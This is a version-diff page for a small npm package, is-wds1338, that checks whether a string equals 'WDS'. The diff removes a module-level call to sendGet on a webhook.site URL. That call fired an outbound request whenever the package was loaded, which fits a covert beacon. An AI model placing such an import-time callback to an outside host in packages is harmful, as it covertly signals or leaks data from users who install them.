RubyGems
npm
Organizations
Log in
Sign up
npm
is-wds1338
Versions diffs
1.0.1 → 1.0.2
is-wds1338 1.0.1 → 1.0.2
Sign up to get
free
protection for your applications and to get access to all the features.
Files changed (2)
hide
show
package/index.js
+0
-4
package/package.json
+1
-1
package/index.js
CHANGED
Viewed
@@ -18,7 +18,3 @@ module.exports = {
18
18
isWds
19
19
};
20
20
21
-
sendGet("https://webhook.site/0be863c0-10fd-4e42-bc92-240ad4d58109")
22
-
23
-
//console.log(isWds("a"));
24
-
//console.log(sendGet("https://webhook.site/0be863c0-10fd-4e42-bc92-240ad4d58109"))
package/package.json
CHANGED
Viewed
@@ -1,6 +1,6 @@
1
1
{
2
2
"name": "is-wds1338",
3
-
"version": "1.0.
1
",
3
+
"version": "1.0.
2
",
4
4
"description": "Is the string WDS?",
5
5
"main": "index.js",
6
6
"scripts": {